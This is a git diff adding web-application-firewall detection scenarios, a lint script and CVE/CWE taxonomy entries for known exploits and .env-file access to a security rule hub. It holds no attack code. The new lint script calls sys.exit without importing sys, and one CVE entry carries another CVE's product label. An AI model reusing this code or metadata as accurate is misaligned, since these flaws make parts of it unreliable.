description: "Parse palo-alto-threat-log logs"
filter: "evt.Parsed.program == 'palo-alto-threat'"
diff --git a/scenarios/crowdsecurity/appsec-vpatch.yaml b/scenarios/crowdsecurity/appsec-vpatch.yaml
new file mode 100644
index 00000000000..88e28ba4fcb
--- /dev/null
+++ b/scenarios/crowdsecurity/appsec-vpatch.yaml
@@ -0,0 +1,19 @@
+type: leaky
+format: 3.0
+name: crowdsecurity/appsec-vpatch
+description: "Detect appsec attacks"
+filter: "evt.Meta.log_type == 'appsec-block'"
+distinct: evt.Meta.rule_name
+leakspeed: "60s"
+capacity: 1
+groupby: evt.Meta.source_ip
+blackhole: 1m
+labels:
+ service: http
+ confidence: 3
+ spoofable: 0
+ classification:
+ - attack.T1110
+ label: "appsec blocked"
+ behavior: "http:exploit"
+ remediation: true
diff --git a/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml b/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml
new file mode 100644
index 00000000000..a0c37115e0f
--- /dev/null
+++ b/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml
@@ -0,0 +1,19 @@
+type: leaky
+filter: evt.Parsed.program == 'crowdsec-appsec' && evt.Appsec.HasInBandMatches == true && evt.Parsed.action in ["deny", "drop"]
+#debug: true
+name: crowdsecurity/crowdsec-appsec-inband
+description: IP has triggered multiples In Band CrowdSec appsec rules
+blackhole: 1m
+leakspeed: 30s
+capacity: 1
+groupby: evt.Meta.source_ip
+distinct: evt.Appsec.GetName()
+labels:
+ confidence: 3
+ spoofable: 0
+ classification:
+ - attack.T1190
+ behavior: "http:exploit"
+ label: "Triggered multiple inband CrowdSec appsec rules"
+ service: http
+ remediation: true
diff --git a/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml b/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml
new file mode 100644
index 00000000000..a638dc36999
--- /dev/null
+++ b/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml
@@ -0,0 +1,51 @@
+# just count distinct number of requests getting blocked
+type: leaky
+filter: evt.Parsed.program == 'crowdsec-waap' && evt.Appsec.HasInBandMatches == false && evt.Parsed.action in ["deny", "drop"]
+name: crowdsecurity/crowdsec-appsec-outofband
+description: IP has triggered more than 5 CrowdSec Out Of Band Waap rules
+blackhole: 2m
+leakspeed: 30s
+capacity: 5
+labels:
+ type: exploit
+ remediation: true
+groupby: "evt.Meta.source_ip"
+#---
+# at least requests blocked on 3 distinct URIs
+#type: leaky
+#debug: true
+#filter: evt.Parsed.program == 'crowdsec-waap' && evt.Parsed.action == "deny"
+#name: crowdsecurity/waf-probing
+#description: "WAF probing"
+#blackhole: 2m
+#leakspeed: 60s
+#capacity: 5
+#groupby: "evt.Meta.source_ip + evt.Parsed.target_uri"
+#labels:
+# type: exploit
+# remediation: true
+#---
+# # at least 5 requests blocked with **distinct** IDs
+#type: conditional
+#debug: true
+#name: crowdsecurity/xss-probing
+#description: at least 5 different XSS rules
+#filter: evt.Parsed.program == 'crowdsec-waap' && evt.Parsed.action == "deny"
+#condition: len( distinct( merge( all(evt.Queue, { #.Waap.GetIDs()}) ) ) ) > 5
+#condition: |
+# LogInfo("%+v", FlattenDistinct(
+# map( queue.Queue,
+# #.Waap.ByTagRx(".*xss.*").GetRuleIDs()
+# )
+# )) &&
+# len(
+# FlattenDistinct(
+# map( queue.Queue,
+# #.Waap.ByTagRx(".*xss.*").GetRuleIDs()
+# )
+# )) > 5
+#condition: 'Distance("aa", "bb", "cc", { #.Parsed.toto == 1 })'
+#capacity: -1
+#cache_size: 1000
+#leakspeed: 30s
+#distinct: evt.Meta.source_ip
\ No newline at end of file
diff --git a/scripts/.scenariosignore b/scripts/.scenariosignore
index 6a9041e08ef..e4296b3ba6b 100644
--- a/scripts/.scenariosignore
+++ b/scripts/.scenariosignore
@@ -3,3 +3,5 @@ crowdsecurity/postscreen-rbl
crowdsecurity/postfix-spam
crowdsecurity/palo-alto-threat
crowdsecurity/exim-spam
+crowdsecurity/base-config
+crowdsecurity/crs
\ No newline at end of file
diff --git a/scripts/appsec_vpatch_lint.py b/scripts/appsec_vpatch_lint.py
new file mode 100644
index 00000000000..71c21de26a3
--- /dev/null
+++ b/scripts/appsec_vpatch_lint.py
@@ -0,0 +1,99 @@
+import os
+import yaml
+import argparse
+from yaml.loader import SafeLoader
+
+VPATCH_COLLECTION_FILEPATH = "./collections/crowdsecurity/appsec-virtual-patching.yaml"
+VPATCH_COLLECTION_NAME = "crowdsecurity/appsec-virtual-patching"
+WORKFLOW_FILEPATH = ".github/workflows/appsec_vpatch_lint.yaml"
+SCRIPT_FILEPATH = "scripts/appsec_vpatch_lint.py"
+author = os.environ.get("AUTHOR", "ghost")
+
+INTRO_STR = f"""
+Hello @{author} and thank you for your contribution!
+
+It seems that the following scenarios are not part of the '{VPATCH_COLLECTION_NAME}' collection:
+
+"""
+
+OK_STR = f"""
+Hello @{author},
+
+The new VPATCH Rule is compliant, thank you for your contribution!
+"""
+
+
+def main():
+ args = parse_args()
+ if args.hub == "":
+ print("[-] Please provide the hub path with the --hub argument")
+ sys.exit(1)
+
+ changed_files = os.environ.get("changed_files", "").split(",")
+ if (
+ changed_files == [""]
+ or WORKFLOW_FILEPATH
+ in changed_files # if the workflow file has been modified, we want to run the script on all rules
+ or SCRIPT_FILEPATH
+ in changed_files # if the script has been modified, we want to run it on all rules
+ ):
+ changed_files = []
+ print("[-] No changed files found, run on all files.")
+ else:
+ print("[+] Changed files: {}".format(changed_files))
+
+ vpatch_collection = yaml.load(
+ open(VPATCH_COLLECTION_FILEPATH, "r"), Loader=SafeLoader
+ )
+ vpatch_collection_rules = vpatch_collection["appsec-rules"]
+ missing_rules = list()
+
+ hub_appsecrules_path = os.path.join(args.hub, "appsec-rules")
+ for r, d, f in os.walk(hub_appsecrules_path):
+ for file in f:
+ if file.endswith(".yaml") or file.endswith(".yml"):
+ if len(changed_files) == 0 or (
+ len(changed_files) > 0 and file in changed_files
+ ):
+ if not file.startswith("vpatch-"):
+ continue
+ f = open(os.path.join(r, file), "r")
+ data = list(yaml.load_all(f, Loader=SafeLoader))
+ print("[*] Processing rule '{}'".format(file))
+ for rule in data:
+ if rule["name"] not in vpatch_collection_rules:
+ missing_rules.append(rule["name"])
+
+ f = open(args.errors, "w")
+ if len(missing_rules) > 0:
+ f.write(INTRO_STR)
+ for rule in missing_rules:
+ f.write("**{}**\n".format(rule))
+ else:
+ f.write(OK_STR)
+
+ f.close()
+
+
+def parse_args():
+ parser = argparse.ArgumentParser(
+ description="Generate CrowdSec Scenarios taxonomy file"
+ )
+ parser.add_argument("--hub", type=str, help="Hub folder path", default=".")
+ parser.add_argument(
+ "-e",
+ "--errors",
+ type=str,
+ help="Output errors file path",
+ default="./appsec_vpatch_cve_error.md",
+ )
+
+ parser.add_argument(
+ "-v", "--verbose", action="store_true", help="Verbose mode", default=False
+ )
+
+ return parser.parse_args()
+
+
+if __name__ == "__main__":
+ main()
diff --git a/scripts/scenario_taxonomy.py b/scripts/scenario_taxonomy.py
index a656b80ed0c..fb53ff8ee22 100644
--- a/scripts/scenario_taxonomy.py
+++ b/scripts/scenario_taxonomy.py
@@ -6,15 +6,17 @@
import yaml
import argparse
from yaml.loader import SafeLoader
+from itertools import chain
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,7}")
+CWE_RE = re.compile(r"CWE-\d{2,6}")
author = os.environ.get("AUTHOR", "ghost")
OK_STR = f"""
Hello @{author},
-Scenarios are compliant with the taxonomy, thank you for your contribution!
+Scenarios/AppSec Rule are compliant with the taxonomy, thank you for your contribution!
"""
INTRO_STR = f"""
@@ -23,7 +25,7 @@
I'm a bot that helps maintainers to validate scenarios and ensure they include all the required information.
I've found some errors in your scenarios, please fix them and re-submit your PR, or ask for help if you need it.
-The following scenarios have errors:
+The following items have errors:
"""
@@ -128,6 +130,26 @@ def get_mitre_techniques_from_label(labels, mitre_data):
return ret, errors
+def get_cwe_from_label(labels):
+ ret = list()
+ errors = list()
+ if "classification" not in labels:
+ return ret, errors
+
+ for classification in labels["classification"]:
+ split_cwe = classification.split(".")
+ if split_cwe[0] != "cwe":
+ continue
+ cwe = split_cwe[1].upper()
+
+ if CWE_RE.match(cwe) == None:
+ errors.append("bad CWE format: {}".format(cwe))
+ continue
+ ret.append(cwe)
+
+ return ret, errors
+
+
def get_cve_from_label(labels):
ret = list()
errors = list()
@@ -165,7 +187,7 @@ def main():
stats = {"scenarios_ok": [], "scenarios_nok": [], "mitre": [], "behaviors": []}
hub_scenarios_path = os.path.join(args.hub, "scenarios")
-
+ hub_appsecrules_path = os.path.join(args.hub, "appsec-rules")
ignore_list = list()
if os.path.exists(args.ignore):
ignore_list = open(args.ignore).read().split("\n")
@@ -174,7 +196,9 @@ def main():
scenarios_taxonomy = dict()
filepath_list = []
- for r, d, f in os.walk(hub_scenarios_path):
+ for r, d, f in chain.from_iterable(
+ os.walk(path) for path in [hub_scenarios_path, hub_appsecrules_path]
+ ):
for file in f:
if file.endswith(".yaml") or file.endswith(".yml"):
filepath_list.append(os.path.join(r, file))
@@ -183,6 +207,7 @@ def main():
cpt = 0
mitres = dict()
for filepath in filepath_list:
+ print("[+] Processing {}".format(filepath))
f = open(filepath, "r")
data = list(yaml.load_all(f, Loader=SafeLoader))
@@ -209,7 +234,6 @@ def main():
if len(mitre_techniques) == 0:
scenario_errors.append("`attack` not found in labels.classification")
-
service = labels.get("service", None)
for m in mitre_techniques:
@@ -229,6 +253,8 @@ def main():
cves, cves_errors = get_cve_from_label(labels)
scenario_errors.extend(cves_errors)
+ cwes, cwes_errors = get_cwe_from_label(labels)
+ scenario_errors.extend(cwes_errors)
scenario_label = ""
confidence = 0
@@ -281,6 +307,8 @@ def main():
if len(scenario_errors) > 0 and filepath[2:] in changed_files:
errors[scenario["name"]] = scenario_errors
stats["scenarios_nok"].append(scenario["name"])
+ else:
+ stats["scenarios_ok"].append(scenario["name"])
scenarios_taxonomy[scenario["name"]] = {
"name": scenario["name"],
@@ -294,10 +322,10 @@ def main():
"service": service,
}
- stats["scenarios_ok"].append(scenario["name"])
-
if len(cves) > 0:
scenarios_taxonomy[scenario["name"]]["cves"] = cves
+ if len(cwes) > 0:
+ scenarios_taxonomy[scenario["name"]]["cwes"] = cwes
f = open(args.output, "w")
f.write(json.dumps(scenarios_taxonomy, indent=2))
diff --git a/taxonomy/scenarios.json b/taxonomy/scenarios.json
index 7c9c8963edc..c7a52a70399 100644
--- a/taxonomy/scenarios.json
+++ b/taxonomy/scenarios.json
@@ -1,4 +1,441 @@
{
+ "crowdsecurity/vpatch-CVE-2017-9841": {
+ "name": "crowdsecurity/vpatch-CVE-2017-9841",
+ "description": "Detect CVE-2017-9841 exploits ",
+ "label": "PHPUnit RCE (CVE-2017-9841)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2017-9841"
+ ],
+ "cwes": [
+ "CWE-94"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2019-12989": {
+ "name": "crowdsecurity/vpatch-CVE-2019-12989",
+ "description": "Detect CVE-2019-12989 exploits ",
+ "label": "citrix SQLi (CVE-2019-12989)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2019-12989"
+ ],
+ "cwes": [
+ "CWE-89"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2020-11738": {
+ "name": "crowdsecurity/vpatch-CVE-2020-11738",
+ "description": "Detect CVE-2020-11738 exploits ",
+ "label": "Wordpress Snap Creek Duplicator (CVE-2020-11738)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2020-11738"
+ ],
+ "cwes": [
+ "CWE-22"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2021-22941": {
+ "name": "crowdsecurity/vpatch-CVE-2021-22941",
+ "description": "Detect CVE-2021-22941 exploits ",
+ "label": "Citrix RCE (CVE-2021-22941)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2021-22941"
+ ],
+ "cwes": [
+ "CWE-284"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2021-3129": {
+ "name": "crowdsecurity/vpatch-CVE-2021-3129",
+ "description": "Detect CVE-2021-3129 exploits ",
+ "label": "Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2021-3129"
+ ],
+ "cwes": [
+ "CWE-98"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2022-27926": {
+ "name": "crowdsecurity/vpatch-CVE-2022-27926",
+ "description": "Detect CVE-2022-27926 exploits ",
+ "label": "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2022-27926"
+ ],
+ "cwes": [
+ "CWE-79"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2022-35914": {
+ "name": "crowdsecurity/vpatch-CVE-2022-35914",
+ "description": "Detect CVE-2022-35914 exploits ",
+ "label": "GLPI <=10.0.2 - Remote Command Execution (CVE-2022-35914)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2022-35914"
+ ],
+ "cwes": [
+ "CWE-74"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2022-44877": {
+ "name": "crowdsecurity/vpatch-CVE-2022-44877",
+ "description": "Detect CVE-2022-44877 exploits ",
+ "label": "CentOS Web Panel 7 RCE (CVE-2022-44877)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2022-44877"
+ ],
+ "cwes": [
+ "CWE-78"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2022-46169": {
+ "name": "crowdsecurity/vpatch-CVE-2022-46169",
+ "description": "Detect CVE-2022-46169 exploits ",
+ "label": "Cacti <=1.2.22 - Remote Command Injection (CVE-2022-46169)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2022-46169"
+ ],
+ "cwes": [
+ "CWE-74",
+ "CWE-77",
+ "CWE-78",
+ "CWE-863"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-20198": {
+ "name": "crowdsecurity/vpatch-CVE-2023-20198",
+ "description": "Detect CVE-2023-20198 exploits ",
+ "label": "CISCO IOS XE account creation (CVE-2023-20198)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-20198"
+ ],
+ "cwes": [
+ "CWE-287"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-22515": {
+ "name": "crowdsecurity/vpatch-CVE-2023-22515",
+ "description": "Detect CVE-2023-22515 exploits ",
+ "label": "Atlassian Confluence Privesc (CVE-2023-22515)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-22515"
+ ],
+ "cwes": [
+ "CWE-284"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-24489": {
+ "name": "crowdsecurity/vpatch-CVE-2023-24489",
+ "description": "Detect CVE-2023-24489 exploits ",
+ "label": "Citrix ShareFile RCE (CVE-2023-24489)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-24489"
+ ],
+ "cwes": [
+ "CWE-284"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-33617": {
+ "name": "crowdsecurity/vpatch-CVE-2023-33617",
+ "description": "Detect CVE-2023-33617 exploits ",
+ "label": "Atlassian Confluence Privesc (CVE-2023-33617)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-33617"
+ ],
+ "cwes": [
+ "CWE-78"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-34362": {
+ "name": "crowdsecurity/vpatch-CVE-2023-34362",
+ "description": "Detect CVE-2023-34362 exploits ",
+ "label": "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-34362"
+ ],
+ "cwes": [
+ "CWE-89"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-3519": {
+ "name": "crowdsecurity/vpatch-CVE-2023-3519",
+ "description": "Detect CVE-2023-3519 exploits ",
+ "label": "Citrix RCE (CVE-2023-3519)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-3519"
+ ],
+ "cwes": [
+ "CWE-94"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-38205": {
+ "name": "crowdsecurity/vpatch-CVE-2023-38205",
+ "description": "Detect CVE-2023-38205 exploits ",
+ "label": "Adobe ColdFusion access control bypass (CVE-2023-38205)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-38205"
+ ],
+ "cwes": [
+ "CWE-284"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-40044": {
+ "name": "crowdsecurity/vpatch-CVE-2023-40044",
+ "description": "Detect CVE-2023-40044 exploits ",
+ "label": "WS_FTP .NET deserialize RCE (CVE-2023-40044)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-40044"
+ ],
+ "cwes": [
+ "CWE-502"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-42793": {
+ "name": "crowdsecurity/vpatch-CVE-2023-42793",
+ "description": "Detect CVE-2023-42793",
+ "label": "JetBrains Teamcity auth bypass (CVE-2023-42793)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-42793"
+ ],
+ "cwes": [
+ "CWE-288"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-50164": {
+ "name": "crowdsecurity/vpatch-CVE-2023-50164",
+ "description": "Detect CVE-2023-50164 exploits ",
+ "label": "Apache Struts2 (CVE-2023-50164)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-50164"
+ ],
+ "cwes": [
+ "CWE-552"
+ ]
+ },
+ "crowdsecurity/vpatch-env-access": {
+ "name": "crowdsecurity/vpatch-env-access",
+ "description": "Detect access to .env files",
+ "label": "Access to .env file",
+ "behaviors": [
+ "http:scan"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http"
+ },
"Dominic-Wagner/vaultwarden-bf": {
"name": "Dominic-Wagner/vaultwarden-bf",
"description": "Detect vaultwarden bruteforce",
@@ -927,6 +1364,21 @@
"CVE-2021-44228"
]
},
+ "crowdsecurity/appsec-vpatch": {
+ "name": "crowdsecurity/appsec-vpatch",
+ "description": "Detect appsec attacks",
+ "label": "appsec blocked",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0006:T1110"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http"
+ },
"crowdsecurity/asterisk_bf": {
"name": "crowdsecurity/asterisk_bf",
"description": "Detect asterisk user bruteforce",
@@ -1337,6 +1789,32 @@
"cti": true,
"service": "cpanel"
},
+ "crowdsecurity/crowdsec-appsec-inband": {
+ "name": "crowdsecurity/crowdsec-appsec-inband",
+ "description": "IP has triggered multiples In Band CrowdSec appsec rules",
+ "label": "Triggered multiple inband CrowdSec appsec rules",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http"
+ },
+ "crowdsecurity/crowdsec-appsec-outofband": {
+ "name": "crowdsecurity/crowdsec-appsec-outofband",
+ "description": "IP has triggered more than 5 CrowdSec Out Of Band Waap rules",
+ "label": "IP HAS Triggered More Than 5 Crowdsec OUT OF Band Waap Rules",
+ "behaviors": [],
+ "mitre_attacks": [],
+ "confidence": 0,
+ "spoofable": 0,
+ "cti": true,
+ "service": null
+ },
"crowdsecurity/dovecot-spam": {
"name": "crowdsecurity/dovecot-spam",
"description": "detect errors on dovecot",
@@ -1959,6 +2437,32 @@
"cti": true,
"service": "http"
},
+ "crowdsecurity/impossible-travel-user": {
+ "name": "crowdsecurity/impossible-travel-user",
+ "description": "impossible travel user",
+ "label": "Impossible travel",
+ "behaviors": [],
+ "mitre_attacks": [
+ "TA0003:T1078"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "authentication"
+ },
+ "crowdsecurity/impossible-travel": {
+ "name": "crowdsecurity/impossible-travel",
+ "description": "impossible travel",
+ "label": "Impossible travel",
+ "behaviors": [],
+ "mitre_attacks": [
+ "TA0003:T1078"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "authentication"
+ },
"crowdsecurity/iptables-scan-multi_ports": {
"name": "crowdsecurity/iptables-scan-multi_ports",
"description": "ban IPs that are scanning us",
diff --git a/update.go b/update.go
index 542258f59f1..75599d676be 100644
--- a/update.go
+++ b/update.go
@@ -62,7 +62,7 @@ func updateIndex(configType string, idx map[string]map[string]typeInfo, tmpIdx m
var tInfo typeInfo
hubName, err := tInfo.generate(filepath, configType)
if err != nil {
- fmt.Printf("skipping '%s' because : %s\n", filepath, err.Error())
+ fmt.Printf("skipping '%s' for update because : %s\n", filepath, err.Error())
} else {
idx[configType][hubName] = tInfo
}